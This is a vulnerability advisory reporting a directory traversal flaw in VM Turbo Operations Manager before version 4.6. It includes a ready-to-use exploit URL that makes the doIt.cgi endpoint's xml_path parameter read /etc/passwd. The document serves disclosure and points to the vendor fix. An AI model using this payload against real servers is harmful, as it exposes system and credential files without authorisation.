33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
Product: VM Turbo Operations Manager
|
|
Vendor: VM Turbo
|
|
Vulnerable Version(s): 4.5.x earlier
|
|
Tested Version: 4.0
|
|
Advisory Publication: April 11, 2014
|
|
Vendor Notification: April 11, 2014
|
|
Public Disclosure: May 8, 2014
|
|
Vulnerability Type: Directory Traversal
|
|
|
|
Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )
|
|
|
|
------------------------------------------------------------------------
|
|
-----------------------
|
|
|
|
Advisory Details:
|
|
|
|
A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file.
|
|
|
|
|
|
The following exploitation example displays the contents of /etc/passwd
|
|
|
|
http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
|
|
|
|
------------------------------------------------------------------------
|
|
-----------------------
|
|
|
|
Solution:
|
|
|
|
The vendor has released a fix for this vulnerability in version 4.6.
|
|
|
|
References:
|
|
|
|
[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement |